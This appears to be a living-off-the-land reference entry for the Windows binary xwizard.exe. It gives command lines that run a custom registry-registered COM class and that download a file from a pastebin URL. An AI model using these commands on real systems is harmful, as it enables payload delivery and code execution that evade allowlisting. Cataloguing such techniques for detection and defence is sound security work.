Paths:

C:\Windows\System32\xwizard.exe
C:\Windows\SysWOW64\xwizard.exe

Detection:

Execute

Xwizard.exe running a custom class that has been added to the registry.

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}

Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.

xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

Download

Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.

xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM